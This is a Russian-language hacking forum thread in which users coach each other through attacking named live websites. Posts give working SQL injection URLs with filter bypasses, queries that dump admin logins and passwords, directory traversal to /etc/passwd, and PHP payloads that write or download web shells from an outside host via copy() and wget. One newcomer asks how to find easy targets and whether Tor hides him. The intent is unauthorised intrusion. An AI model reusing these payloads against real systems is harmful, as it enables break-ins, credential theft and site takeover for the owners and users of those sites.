Действительно дело в шелле, я вот только что заметил что даже у себя на хосте некоторые шеллы не работают, даже в формате *.txt не отображаются (forbidden)

Из за чего эт, мб АВ ?

pirat0 said:
извини чувак, но ничего не понял из выше написаного


Ссылку дай в ПМ. Посмотрю что смогу сделать...


sl1k said:
Действительно дело в шелле, я вот только что заметил что даже у себя на хосте некоторые шеллы не работают, даже в формате *.txt не отображаются (forbidden)
Из за чего эт, мб АВ ?


Может, что-то в коде меня? может неправильно авторизацию поставил?... вариантов много...

trololoman96 said:
Тут можно спокойно обойтись и без вывода в ошибке и тем более не заморачиваться с тайм басед методом, там есть вывод в урл

Code:
www.shop-stroitel.ru/catalog/?id=14+union+select+1,version(),3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44 ,45--+



не, ну версию ещо да, а вот например


PHP:
http://www.shop-stroitel.ru/catalog/?id=14+union+select+1,table_name,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,4 4,45+from+information_schema.tables--+



уже не выводит

qaz said:
не, ну версию ещо да, а вот например
...
уже не выводит


А так выводит:

?id=14+union+select+1,hex(table_name),...,45+from+ information_schema.tables--+

trololoman96 said:
obnovi-soft[antigoogle].ru/software'
Что то не получается раскрутить, если и избавляюсь от sql ошибки то остается друга без намека на иньект, либо происходит редирект.


Нельзя использовать пробел, запятую, слеш, процент, возможно что-то еще. Нашел такой вариант:

1) false. редирект есть. version() like '4%'

/desktop'and(version())like(0x3425)and'1

2) true. редиректа нет. version() like '5%'.

/desktop'and(version())like(0x3525)and'1

upd:

Точка вырезается, так что придется брутить имена таблиц и колонок

M_script said:
Нельзя использовать пробел, запятую, слеш, процент, возможно что-то еще. Нашел такой вариант:
1)
false
. редирект есть. version() like '4%'
/desktop'and(version())like(0x3425)and'1
2)
true
. редиректа нет. version() like '5%'.
/desktop'and(version())like(0x3525)and'1
upd:
Точка вырезается, так что придется брутить имена таблиц и колонок


Не пугай парня

Вывод:

http://www.obnovi-soft.ru/desktop' and 1=2 union select * from (select 1)a join (select 2)b join (select version())c join (select 4)d join (select 5)i-- '1

Пробелы норм, проблема с запятыми, ну и дальше с точками будет, как ты и сказал

I'm stalked here.


Code:
http://pvrpg.net/forum/view_thread.php?id=8762&page=1 (NO ERROR)



Code:
http://pvrpg.net/forum/view_thread.php?id=8762&page=-1 (ERROR)

Shows site is vulnerable.

Now, I try order by and many things, all do not work.


Code:
http://pvrpg.net/forum/view_thread.php?id=8762&page=-1%27+or+1+/!*group*/+by+/!*concat*/%28version%28%29,rand%280%29|0%29+having+min%280%2 9--+

Any help?

lightangel said:
I'm stalked here.

Code:
http://pvrpg.net/forum/view_thread.php?id=8762&page=1 (NO ERROR)


Code:
http://pvrpg.net/forum/view_thread.php?id=8762&page=-1 (ERROR)

Shows site is vulnerable.
Now, I try order by and many things, all do not work.

Code:
http://pvrpg.net/forum/view_thread.php?id=8762&page=-1%27+or+1+/!*group*/+by+/!*concat*/%28version%28%29,rand%280%29|0%29+having+min%280%2 9--+

Any help?


Там нет скули

255 order by 1--


получается такой запрос, как избавиться от того, что до моего запроса?

faza02 said:
получается такой запрос, как избавиться от того, что до моего запроса?


Никак.

тогда еще вопрос

подбираю кол-во полей, сначала Unknown column '7' in 'order clause'

а на 6

Table 'wsl.home' doesn't exist

ну и с выводом я потерялся, где он там

и вот, про подзапросы

прочитал я от джкестера /showpost.php?p=1047515&postcount=48

и вопрос, то есть он рассматривает когда при подборе на одном числе ошибка, а на втором ошибка, но уже с выводом?

я такого не встречал просто

вот тут например

http://exchange.guhsd.net/details.php?object_id=2251+order+by+8--

faza02 said:
тогда еще вопрос
подбираю кол-во полей, сначала Unknown column '7' in 'order clause'
а на 6
Table 'wsl.home' doesn't exist
ну и с выводом я потерялся, где он там
и вот, про подзапросы
прочитал я от джкестера /showpost.php?p=1047515&postcount=48
и вопрос, то есть он рассматривает когда при подборе на одном числе ошибка, а на втором ошибка, но уже с выводом?
я такого не встречал просто
вот тут например
http://exchange.guhsd.net/details.php?object_id=2251+order+by+8--


Обычно в таких случаях я юзаю error-based. У тебя так выводит, потому что:

http://exchange.guhsd.net/details.php?object_id=2251

wsl.home действительно не существует.

Code:
http://exchange.guhsd.net/details.php?object_id=(2251)or(1)group+by(concat(v ersion(),0x00,floor(rand(0)*2)))having(min(0)or(1) )

Не могу найти(вроде тут видел) дефолтные пути конфигов апача

Iggy said:
Не могу найти(вроде тут видел) дефолтные пути конфигов апача


/thread49775.html

Expl0ited said:
/thread49775.html


Ок, спс. А на замену етте'евскому справочнику itdefence.ru/dbitems/ есть что-нибудь? Или мож то кто копирнуть успел???

Iggy said:
Ок, спс. А на замену етте'евскому справочнику
itdefence.ru/dbitems/
есть что-нибудь? Или мож то кто копирнуть успел???


Конечно успел ^^

Держи http://rghost.net/35762282

Веб-версия если что: http://dbitems.wen.ru/index.htm

Конечно успел ^^
Держи http://rghost.net/35762282
Веб-версия если что: http://dbitems.wen.ru/index.htm


Красава!

Это что у нас за шелл?

http://img802.imageshack.us/img802/5783/screenshottgl.png

Iggy said:
Это что у нас за шелл?


Может быть любым шеллов, написать такую авторизацию 5-6 строк. А вообще с чего ты взял, что это шелл? Мб админка или еще что-то.

Да шелл это, я много раз на такой натыкался, ток не могу вспомнить его рабочее название! c100 чтоли?!

Iggy said:
Да шелл это, я много раз на такой натыкался, ток не могу вспомнить его рабочее название! c100 чтоли?!


C99 ещё немного угадал бы

Iggy said:
Да шелл это, я много раз на такой натыкался, ток не могу вспомнить его рабочее название! c100 чтоли?!


Другие залили шелл - ты тоже сможешь. Залей да посмотри

aydin-ka said:
C99 ещё немного угадал бы


Не, маднетовский весит 43кб - этот 28кб

если только упакован

...........

ан не, маднетовский упакованный 43кб весит, так что...

Iggy said:
Не, маднетовский весит 43кб - этот 28кб
если только упакован
...........
ан не, маднетовский упакованный 43кб весит, так что...


так что дай адрес, шелл зальем, самому любопытно стало

M_script said:
А так выводит:
?id=14+union+select+1,
hex(
table_name
)
,...,45+from+information_schema.tables--+


так пишет

Unknown column '4348415241435445525F53455453' in 'where clause'

qaz said:
так пишет
Unknown column '4348415241435445525F53455453' in 'where clause'


потому что нужно unhex(hex())

зы

http://www.shop-stroitel.ru/catalog/?id=14+or+1+group+by+concat((select+table_name+fro m+information_schema.tables+limit+0,1),rand(0)|0)+ having+min(0)--+

qaz said:
Unknown column '4348415241435445525F53455453' in 'where clause'


Вывод в hex, поэтому нужно конвертировать в строку.

unhex(4348415241435445525F53455453) = 'CHARACTER_SETS'.

Iggy said:
Это что у нас за шелл?
http://img802.imageshack.us/img802/5783/screenshottgl.png


https://rdot.org/forum/showthread.php?t=105&page=7 - 65 пост

Внешне похож, размер тоже совпадает (28кб)

…syntax to use near '.tables limit 1,1--' at line 1


запрос такой

SELECT * FROM articole WHERE id = -797 union select 1,2,table_name,4,5,6,7 infornation_schema.tables limit 1,1--

ему точка не нравится, или он запрос урезает?

faza02 said:
запрос такой
SELECT * FROM articole WHERE id = -797 union select 1,2,table_name,4,5,6,7 infornation_schema.tables limit 1,1--
ему точка не нравится, или он запрос урезает?


Думаю фильтруется точка.

M_script said:
https://rdot.org/forum/showthread.php?t=105&page=7 - 65 пост
Внешне похож, размер тоже совпадает (28кб)


Ахаха)) ага, только вот как назло php стоитна выполнение - и качнуть его как не получается))

м, глянул твой пост - красиво вскрыл!

faza02 said:
запрос такой
SELECT * FROM articole WHERE id = -797 union select 1,2,table_name,4,5,6,7 infornation_schema.tables limit 1,1--
ему точка не нравится, или он запрос урезает?


infornation написано с ошибкой.

чакэ, да, ошибся, но запрос не изменило

Ereee, как можно послать запрос? hex? он не сработал

Чакэ said:
infor
n
ation написано с ошибкой.


При такой опечатке выдало бы другую ошибку.

faza02,

hex тебе не поможет, я думаю фильтрацию точки обойти нельзя. Попробуй брутить имена таблиц(стандартные users, admin, members и т.д.), смотри на движки и узнай имена таблиц здесь:

http://dbitems.wen.ru

faza02 said:
чакэ, да, ошибся, но запрос не изменило
Ereee, как можно послать запрос? hex? он не сработал


как я такое бревно не заметил select ololo from information..

Здаствуйте!

Не могу найти пасс админа. Итак, базы:


CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_ APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN _USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEG ES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVI LEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,addr,ban_clic k,ban_stat,ban_view,banner,city,firm,firmtov,forum ,fpage,fronthref,frontpage,golos,ibf_acp_help,ibf_ admin_login_logs,ibf_admin_logs,ibf_admin_permissi on_keys,ibf_admin_permission_rows,ibf_admin_sessio ns,ibf_announcements,ibf_api_log,ibf_api_users,ibf _attachments,ibf_attachments_type,ibf_badwords,ibf _banfilters,ibf_bbcode_mediatag,ibf_bulk_mail,ibf_ cache_store,ibf_cal_calendars,ibf_cal_events,ibf_c aptcha,ibf_components,ibf_conf_settings,ibf_conf_s ettings_titles,ibf_contacts,ibf_content_cache_post s,ibf_content_cache_sigs,ibf_converge_local,ibf_co re_applications,ibf_core_hooks,ibf_core_hooks_file s,ibf_core_incoming_emails,ibf_core_item_markers,i bf_core_item_markers_storage,ibf_core_like,ibf_cor e_like_cache,ibf_core_rss_imported,ibf_core_share_ links,ibf_core_share_lin


Нашел что-то похожее на правду в базе ibf_admin_login_logs:


497:95.26.233.1:Lisaveta:1293725743:1:a:2:{s:3:"get";a:3:{s:6:"adsess";s:32:"adf50898331c99087d5750013949a5d6";s:3:"act";s:5:"login";s:4:"code";s:14:"login-complete";}s:4:"post";a:3:{s:7:"qstring";s:91:"old_adsess=adf50898331c99087d5750013949a5d6&section=content&act=mem&code=search";s:8:"username";s:8:"Lisaveta";s:8:"password";s:6:"*****n";}},


По структуре:


admin_id,admin_ip_address,admin_username,admin_tim e,admin_success,admin_post_details

2York,

-1'+union+select+1,concat(name,0x3a,password),3+fro m+ibf_members+limit+0,1--+a

York said:
Здаствуйте!
Не могу найти пасс админа. Итак, базы:
Нашел что-то похожее на правду в базе ibf_admin_login_logs:
По структуре:


сливай бд через columns, а не tables. а там заодно тяни table_name & table_schema сразу будет видно что где лежит..

Попродробней что значит тяни и как тянуть?) Ссылка такая получилась - -223+union+select+1,group_concat(admin_id,0x3a,admi n_ip_address,0x3a,admin_username,0x3a,admin_time,0 x3a,admin_success,0x3a,admin_post_details),3,4,5,6 +from+ibf_admin_login_logs

York said:
Попродробней что значит тяни и как тянуть?) Ссылка такая получилась - -223+union+select+1,group_concat(admin_id,0x3a,admi n_ip_address,0x3a,admin_username,0x3a,admin_time,0 x3a,admin_success,0x3a,admin_post_details),3,4,5,6 +from+ibf_admin_login_logs


хрен ты там найдешь логин админа..они совсем в другой таблице...изучи сначала структуру ИПБ потом изучи синтаксис мускуля..

York

почитайте статьи, срач запрещено

NZT, вопросы по сканерам и по крекерам интернета отправьте в гугл =\

есть скуля, все выводится и работает но посылая например такой запрос

SELECT `name` FROM `users` WHERE `user_id` = 1

сервер переводит имя таблицы в верхний регистр (USERS)

т.к. сервер на линуксе то там по умолчанию зависит от регистра букв.

вот вопрос, как это можно обойти, никакие lower и т.п. не подходят по ясной причине

Konqi со всем уважением к форуму я не могу найти ответ в гугле, я искал до и после того как задать свой ворпрос здесь и ответа не нашел. Я не знаю как мне решить проблему , можно я еще раз задам здесь свой вопрос?

NZT said:
Konqi
со всем уважением к форуму я не могу найти ответ в гугле, я искал до и после того как задать свой ворпрос здесь и ответа не нашел. Я не знаю как мне решить проблему , можно я еще раз задам здесь свой вопрос?


смотрите имя темы, и подумайте, является ли ваш вопрос "вопросом по уязвимостям"

здесь обсуждают уязвимости, а не программы которые ищут уязвимости в гугле и тп.. это не для нашего форума

надеюсь ясно высказался..

eD"]
[R]eD said:
есть скуля, все выводится и работает но посылая например такой запрос
SELECT `name` FROM `users` WHERE `user_id` = 1
сервер переводит имя таблицы в верхний регистр (USERS)
т.к. сервер на линуксе то там по умолчанию зависит от регистра букв.
вот вопрос, как это можно обойти, никакие lower и т.п. не подходят по ясной причине


попробуй

SELECT `name` FROM lower(`users`) WHERE `user_id` = 1

попугай said:
попробуй
SELECT `name` FROM lower(`users`) WHERE `user_id` = 1


так нарушается синтаксис и выдает ошибку.

eD"]
[R]eD said:
так нарушается синтаксис и выдает ошибку.


SELECT `name` FROM lower('users') WHERE `user_id` = 1

возможно, так

попугай said:
SELECT `name` FROM lower('users') WHERE `user_id` = 1
возможно, так


эти функции распространяются только на элементы выборки. с именами таблиц такое не катит.

Code:
http://www.pmlnjp.com/news.php?newsid=null*%00*/uni-on/**/se-lect/**/1,2,3,4,5,6,7,8,9



Code:
http://www.pmlnjp.com/news.php?newsid=null%20UNION%20SELEC%201,2,39,4,5, 6,7,8,9

I cannot get vulnerable column why?

And no, I don't wanna use blind.

lightangel said:

Code:
http://www.pmlnjp.com/news.php?newsid=null*%00*/uni-on/**/se-lect/**/1,2,3,4,5,6,7,8,9


Code:
http://www.pmlnjp.com/news.php?newsid=null%20UNION%20SELEC%201,2,39,4,5, 6,7,8,9

I cannot get vulnerable column why?
And no, I don't wanna use blind.




Code:
cmd> POST /news.php HTTP/1.0

newsid=1320+and+0+union+select+1,2,3,4,5,6,7,8,9--+

eD"]
[R]eD said:
есть скуля, все выводится и работает но посылая например такой запрос
SELECT `name` FROM `users` WHERE `user_id` = 1
сервер переводит имя таблицы в верхний регистр (USERS)
т.к. сервер на линуксе то там по умолчанию зависит от регистра букв.
вот вопрос, как это можно обойти, никакие lower и т.п. не подходят по ясной причине


Что там по умолчанию зависит от регистра? Это не имена файлов, язык запросов от ОС не зависит.

В mysql ограничение может быть, если имя таблицы или базы встречается несколько раз в одном запросе. В этом случае можно использовать только одинаковый регистр.

верно:


Code:
SELECT * FROM tablename WHERE tablename.columnname=1;
SELECT * FROM TableName WHERE TableName.columnname=1;

неверно:


Code:
SELECT * FROM TableName WHERE tablename.columnname=1;
SELECT * FROM tablename WHERE TableName.columnname=1;


upd:

Ошибся. Все таки таблицы - это файлы

M_script said:
Что там по умолчанию зависит от регистра? Это не имена файлов, язык запросов от ОС не зависит.
В mysql ограничение может быть, если имя таблицы или базы встречается несколько раз в одном запросе. В этом случае можно использовать только одинаковый регистр.
верно:

Code:
SELECT * FROM tablename WHERE tablename.columnname=1;
SELECT * FROM TableName WHERE TableName.columnname=1;

неверно:

Code:
SELECT * FROM TableName WHERE tablename.columnname=1;
SELECT * FROM tablename WHERE TableName.columnname=1;



http://dev.mysql.com/doc/refman/5.0/en/identifier-case-sensitivity.html

сервер выдает ошибку в уже верхнем регистре, т.е. еще до отправки он перевел в верхний регстр запрос

Invalid query: Table 'sqlbd1.ABC_USER' doesn't exist

abc_user 100% существует (проверял в information_schema)

eD"]
[R]eD said:
http://dev.mysql.com/doc/refman/5.0/en/identifier-case-sensitivity.html
сервер выдает ошибку в уже верхнем регистре, т.е. еще до отправки он перевел в верхний регстр запрос
Invalid query: Table 'sqlbd1.ABC_USER' doesn't exist
abc_user 100% существует (проверял в information_schema)


Может быть abc_user просто в другой базе?

Проверь.

union+select+1,2,table_schema+from+information_sch ema.tables+where+table_name=0x6162635f75736572

stepashka_ said:
Может быть abc_user просто в другой базе?
Проверь.
union+select+1,2,table_schema+from+information_sch ema.tables+where+table_name=0x6162635f75736572


самое веселое что и 0x6162635f75736572

он переводит в 0X6162635f75736572 и в итоге ничего не выходит, я вытаскивал по символу через sleep(), база и таблаца верная.

ладно. похоже тут ничего не сделать.

eD"]
[R]eD said:
самое веселое что и 0x6162635f75736572
он переводит в 0X6162635f75736572 и в итоге ничего не выходит, я вытаскивал по символу через sleep(), база и таблаца верная.
ладно. похоже тут ничего не сделать.


Блин, RED, поделись уже ссылкой.

M_script said:
Это не имена файлов


А что это?

Я уже дофига статей прочитал и просмотрел видео по xss и хочу попробовать на деле, только сканер xss по левому сканирует , я нашел online-scaner xss , подскажите мне пожалуйста как в гугле искать простые сайты чтобы найти в них xss , мне просто очень важно найти такой сайт а далше я уже сам разберусь. Благодарнен за любую помощь.

NZT said:
Я уже дофига статей прочитал и просмотрел видео по xss и хочу попробовать на деле, только сканер xss по левому сканирует , я нашел online-scaner xss , подскажите мне пожалуйста как в гугле искать простые сайты чтобы найти в них xss , мне просто очень важно найти такой сайт а далше я уже сам разберусь. Благодарнен за любую помощь.


/thread35802.html

stepashka_ , скажу чесно дело в том что я боюсь на популярных сайтах тренироваться чтобы потом проблем небыло , или Tor достаточно для этих сайтов?

Вот из темы PHP иньекций я взял пример


Code:
http://bombaticket.ru/pg.php?p=../../../../../etc/passwd%00

Скажите пожалуйста, как узнать сколько подставлять ../ ? Это путь до файла на сколько я понял, но где это смотреть, в самой ошибке? Вот ошибка


Code:
Warning: include(htm/fgh.htm) [function.include]: failed to open stream: No such file or directory in /home/www/z74500/bombaticket.ru/pg.php on line 97

Объясните пож-та на данном примере что именно ../../../../../etc/passwd%00 надо подставлять.

Skipp said:
Вот из темы PHP иньекций я взял пример

Code:
http://bombaticket.ru/pg.php?p=../../../../../etc/passwd%00

Скажите пожалуйста, как узнать сколько подставлять
../
? Это путь до файла на сколько я понял, но где это смотреть, в самой ошибке? Вот ошибка

Code:
Warning: include(htm/fgh.htm) [function.include]: failed to open stream: No such file or directory in /home/www/z74500/bombaticket.ru/pg.php on line 97

Объясните пож-та на данном примере что именно
../../../../../etc/passwd%00
надо подставлять.



../ = директорыя выше

./ = данная директория

дир = /papka1/papka2/papka3/

чтобы выйти за пределы этих папок, надо подставить 3 пары

../../../

в твоем примере

папка = /home/www/z74500/bombaticket.ru/

то есть надо подставь 4 пары (../../../../) чтобы смогли подключить файлы начиная с корневой директории

Konqi said:
в твоем примере
папка = /home/www/z74500/bombaticket.ru/
то есть надо подставь 4 пары (../../../../) чтобы смогли подключить файлы начиная с корневой директории


Спасибо, понятно, но в моём примере стоит 5 пар (../../../../../), или я что-то не допонял.

/ 5 home/ 4 www/ 3 z74500/ 2 bombaticket.ru/ 1 pg.php

не?

Skipp said:
Спасибо, понятно, но в моём примере стоит 5 пар (../../../../../), или я что-то не допонял.


4, можно ставить больше, сколько угодно (в пределах макс длины урл), ибо дальше корня не пойти


shadowrun said:
/ 5 home/ 4 www/ 3 z74500/ 2 bombaticket.ru/ 1 pg.php
не?


это когда pg.php стал папкой?

Да, понятно.

Нашел уязвимость, отсылаю пост запрос с содержимым:

$modi=

все выводится. Но когда пытаюсь отослать запрос с кавычкой, получаю ошибку:

Warning: Unexpected character in input: '\' (ASCII=92) state=1 in /h

Подскажите в какую сторону копать, чтобы залить шелл. Например вот так:

file_put_contents($_SERVER[DOCUMENT_ROOT].DIRECTORY_SEPARATOR.'1.php','111';

только как избавится от кавычек?

ocheretko said:
Нашел уязвимость, отсылаю пост запрос с содержимым:
$modi=
все выводится. Но когда пытаюсь отослать запрос с кавычкой, получаю ошибку:
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in /h
Подскажите в какую сторону копать, чтобы залить шелл. Например вот так:
file_put_contents($_SERVER[DOCUMENT_ROOT].DIRECTORY_SEPARATOR.'1.php','111';
только как избавится от кавычек?



copy($_GET[a],$_GET);

через гет отправь

a=http://site.ru/shell.txt&b=/var/www/html/shell.php

если shell_exec не отключено, то можно и print(`wget http://site.ru/shell.php`); или curl

NZT said:
stepashka_
, скажу чесно дело в том что я боюсь на популярных сайтах тренироваться чтобы потом проблем небыло , или
Tor достаточно для этих сайтов?


Поставь себе на комп бажную цмс и тренируйся

Или купи vpn.

Благодарю, все получилось, +1 прием в голову


PHP:
Dim url as String = "example.com"

Dim postdata As String = "modi="

openurl = "http://" & url & "/scriptname.php?scdir=/var/chroot/site/readme.php&ldir=http://yousite.ru/1.txt"

stepashka_ said:
Поставь себе на комп бажную цмс и тренируйся
Или купи vpn.


Насчет быжных сайтов на компе так я хотел бы тренироваться в интернете , так забавней )

А насчет впн , так я хотел бы пока обойтись простыми и не популярными сайтами для тренировки чтобы не нужно было сильно прятаться и заодно бесплатно , или для хорошего опыта желательно поставить впн и потренироваться имено на серьёзных сайтах. Что посоветуешь? Я новичок и хочу научиться , поэтому я обращяюсь за советом поскольку ничего не знаю )

Спасибо.

И как найти простые сайты с xss ? Просто лазить по разным сайтам и искать или можно как то через гугл найти кучу простых сайтов а потом в них уже искать уязвимость?

как залить шелл в xoops через админку?

DyukiN said:
как залить шелл в xoops через админку?


/showpost.php?p=2962252&postcount=4

помогите залить шелл, есть права админа, есть форум (какой-то самописный походу), есть даже загрузка файлов, но блин куда файлы заливаются не могу понять, дело в том что они вызиваются функцыей files.php?act=3,

Очень часто сталкиваюсь вот с такой проблемой, при запросе вида.php?id=-1+union+select+1,2,group_concat(column_name)+from+ information_schema.columns+where+table_name='Shop_ user'+--+

Пишет ошибку:

ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'Shop_user\' --' at line 1

Тоесть ругается на кавычки чтоль? Пробывал 'Shop_user' шифровать. При шифровке выводится стиль страницы с пустым содержимым. Тоесть на месте принтабельного поля ничего нету. Помогите пожалуйсто.

pirat0 said:
помогите залить шелл, есть права админа, есть форум (какой-то самописный походу), есть даже загрузка файлов, но блин куда файлы заливаются не могу понять, дело в том что они вызиваются функцыей files.php?act=3,


Попробуй подставить в параметр act имя несуществуещего файла или подставь кавычку, слеши, вообщем вызови таким образом ошибку. После этого увидишь путь Failed to open stream.. бла бла... /home/path/htdos/files/nesuch_file.php

Если не поможет, то попробуй угадать названия папок, может листинг есть.

2York,

у тебя mq=on, поэтому загони имя таблицы в hex. Тогда синтаксис будет таков:


Code:
table_name=0x53686f705f2075736572--+a

Не.. никак.. вот ссыль

http://neoklimat.ru/pages.php?id=-1+union+select+1,group_concat(column_name),3+from+ information_schema.columns+where+table_name=0x5368 6f705f2075736572+--+

York said:
Не.. никак.. вот ссыль
http://neoklimat.ru/pages.php?id=-1+union+select+1,group_concat(column_name),3+from+ information_schema.columns+where+table_name=0x5368 6f705f2075736572+--+


http://neoklimat.ru/pages.php?id=-1+union+select+1,column_name,3+from+information_sc hema.columns+where+table_name=0x53686F705F75736572 +limit+0,20+--+

вот так катит просто перебором делай, через limit

Ereee, нету там (в моем вопросе) листинга директорий, подставлял неверный запрос просто пустая страница(

Спасибо

2pirat0,

скинь URL в ЛС.

2York,

Все выводится:

http://neoklimat.ru/pages.php?id=-1+union+select+1,group_concat(column_name),3+from+ information_schema.columns+where+table_name=0x5368 6F705F75736572--

www.vizborclub.com/vizborclub/photos_albom.php?id=-51+union+select+1,2,3,login+from+unhex0x2775736572 7327+--+

А тут в чем дело? Не отображаются уже логины с паролями, перебором через лимит не получается.

York said:
www.vizborclub.com/vizborclub/photos_albom.php?id=-51+union+select+1,2,3,login+from+unhex0x2775736572 7327+--+
А тут в чем дело? Не отображаются уже логины с паролями, перебором через лимит не получается.


Во-первых синтаксис не верный. Во-вторых в конце запроса имя таблицы нельзя в хекс переводить(да и нафиг нужен).

P.S. Дам твой дефейс стоит, нафиг тебе скулья?

Если без хекса то

Ой, не то

York said:
www.vizborclub.com/vizborclub/photos_albom.php?id=-51+union+select+1,2,3,login+from+unhex0x2775736572 7327+--+
А тут в чем дело? Не отображаются уже логины с паролями, перебором через лимит не получается.


убери хекс

www.vizborclub.com/vizborclub/photos_albom.php?id=-51+union+select+1,2,3,login+from+'users'+limit+0,3 0+--+

Без результатов

York said:
www.vizborclub.com/vizborclub/photos_albom.php?id=-51+union+select+1,2,3,login+from+'users'+limit+0,3 0+--+
Без результатов


Зачем users в кавычках?

P.S. Сейчас составлю правильный запрос.

UPD. Держи:


Code:
http://www.vizborclub.com/vizborclub/photos_albom.php?id=-1'+union+select+1,concat(nick,0x3a,password)+from+ users+limit+0,1--+a

UPD. Вот еще:

/thread43966.html

Без ковычек тоже самое

York said:
Без ковычек тоже самое


http://www.vizborclub.com/vizborclub/photos_albom.php?id=-51+union+select+1,2,3,password+from+users+limit+0, 30+--+

вот вывел пароли, логины так же, все пляшет

и еше ери ссилка в лс

http://www.vizborclub.com/vizborclub/photos_albom.php?id=-1'+union+select+1,concat(nick,0x3a,password)+from+ users+limit+0,1--+a

Ничего не показал.

York said:
http://www.vizborclub.com/vizborclub/photos_albom.php?id=-1'+union+select+1,concat(nick,0x3a,password)+from+ users+limit+0,1--+a
Ничего не показал.


потому-что колонки "nick" там нет

York said:
http://www.vizborclub.com/vizborclub/photos_albom.php?id=-1'+union+select+1,concat(nick,0x3a,password)+from+ users+limit+0,1--+a
Ничего не показал.


http://s017.radikal.ru/i405/1201/12/d1a829b0e675.jpg

К окулисту...

2pirat0, есть.

P.S. Не за что

Ereee said:
http://s017.radikal.ru/i405/1201/12/d1a829b0e675.jpg
К окулисту...
2pirat0,
есть.


))) а сори недосмотрел

где можно прочитать о выводе данных, если таблица в другой базе?


Error : Table 'soltan_mp3.wp_users' doesn't exist


правильно я понял, мне это нужно?

faza02 said:
где можно прочитать о выводе данных, если таблица в другой базе?
правильно я понял, мне это нужно?


union+select+1,2,table_schema+from+information_sch ema.tables+where+table_name=0x6162635f75736572

0x6162635f75736572 - подставь свой)

кодировать тут - http://x3k.ru/

wp_users будет - 0x77705f7573657273

потом пишешь в запросе: база.wp_users

Шелл не заливается

Пробывал так:

http://www.vizborclub.com/vizborclub/photos_albom.php?id=-1%27+union+select+1,2,3,0x273c3f706870206576616c28 245f4745545b20186520195d29203f3e27+INTO+OUTFILE+'1 .php'+--+

http://www.vizborclub.com/vizborclub/photos_albom.php?id=-1%27+union+select+1,2,3,unhex(hex(0x273c3f70687020 6576616c28245f4745545b20186520195d29203f3e27))+INT O+OUTFILE+'1.php'+--+

http://www.vizborclub.com/vizborclub/photos_albom.php?id=-1%27+union+select+1,2,3,''+INTO+OUTFILE+'1.php'+--+

Очередной раз прошу помощи у старших. Поймите, ведь лучше запоминается когда на практике..

2York,

прав нет.


http://www.vizborclub.com/vizborclub/photos_albom.php?id=-1'+union+select+1,File_priv+from+mysql.user+where+ user='class63c_albosin'--+a

Даже если я под админом зайду?

А как я пойму что File_Prive=Y ? Содержимон страницы выведится?

York said:
А как я пойму что File_Prive=Y ? Содержимон страницы выведится?


да. или ошибку в случае если прав не хватит заглянуть в mysql.user

York said:
Даже если я под админом зайду?


у тебя в бд нету файловых прав. Чтобы они появились в твоем случае - нужен скрипт, который обращается к бд под юзвером, у которого они есть (а я сомневаюсь, что ты найдешь такой скрипт). Д и под каким админом то ты решил зайти?

Зы. проще сначала понять что такое бд, и что за язык такой, через который идет обращение к ней. А уж потом приступать к практике (взлома).

Литературку посоветуете более понятную для новичка?)

York said:
Литературку посоветуете более понятную для новичка?)


Я тебе уже давал литературу в этом посте /showpost.php?p=2971891&postcount=19143

P.S. google

а сам


'1.php'


должен быть в кавычках, и это никак не обойти?

если я правильно понял что ковычки не нужны,попробуй


Code:
\'1.php\'

faza02 said:
а сам
должен быть в кавычках, и это никак не обойти?


а что ты сделать хочешь?

если load_file, то можно захексить. если into outfile, то нельзя.

brain said:
Один интимный вопрос господа:
Есть скуль:
6 поле для вывода.
Когда вывожу серверные команды типа version(), user(), database() /etc - то выводит.
А когда вытаюсь вывести все таблицы то нихрена не выводит
(!) НО когда я поробую вывести заведомо зная таблицу Page и колонку url то выводит записи.
Почему не выводит список таблиц?


ты уверен что там версия mysql >= 5 ?

Konqi said:
ты уверен что там версия mysql >= 5 ?


Sql Version:4.1.25-log

brain said:
Sql Version:4.1.25-log


там нету information_schema

Konqi said:
там нету information_schema


как быть?(что почитать? на ачате все прочитал) курю про инъекции уже 2-ой день, чет хреноватенько получается.. не мой профиль

brain said:
как быть?(что почитать? на ачате все прочитал) курю про инъекции уже 2-ой день, чет хреноватенько получается.. не мой профиль


узнать имена таблиц не получится, тока брут

Вопрос: допустим имеется следующий SQL запрос: UPDATE news SET some_var = var+1 WHERE news_id=27. Уязвимым параметром является news_id. Что и как мне можно из этого выжать? =)

~EviL~ said:
Вопрос: допустим имеется следующий SQL запрос: UPDATE news SET some_var = var+1 WHERE news_id=27. Уязвимым параметром является news_id. Что и как мне можно из этого выжать? =)


http://devteev.blogspot.com/2010/02/sql-injection-insert-update-delete-etc.html

В моем случае уязвимый параметр стоит в запросе после WHERE, что, как мне кажется, существенно ограничивает мои возможности...

~EviL~ said:
В моем случае уязвимый параметр стоит в запросе после WHERE, что, как мне кажется, существенно ограничивает мои возможности...


where 'sqli'

sqli='and (1)=(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)-- x

M_script, как такие запросы строить? в какой статье можно прочитать?

faza02 said:
M_script
, как такие запросы строить? в какой статье можно прочитать?


Например тут (http://devteev.blogspot.com/2010/02/sql-injection-insert-update-delete-etc.html)

faza02 said:
M_script
, как такие запросы строить? в какой статье можно прочитать?


Или тут (https://antichat.live/showpost.php/p/2954871/postcount/14/).

Перелопатил пол инета,ответ так и не нашел...Postgres >8 версия,рут...можно ли вывести все бд как в масе?

BaleHoK said:
Перелопатил пол инета,ответ так и не нашел...Postgres >8 версия,рут...можно ли вывести все бд как в масе?


Вот че в нете нашел:


PHP:
?a=1;CREATE TABLE shell (a text);

?a=1;INSERT INTO shell(a) VALUES ('');

?a=1;COPY shell (a) TO shellaaaa;

?a=1; DROP TABLE shell;

Это и на ачате есть...мне не интересно выполнение команд...ибо скрипты и sql разнесены по сервакам...мне нужен аналог information_schemata как в mysql...существует ли он для постгрес

BaleHoK said:
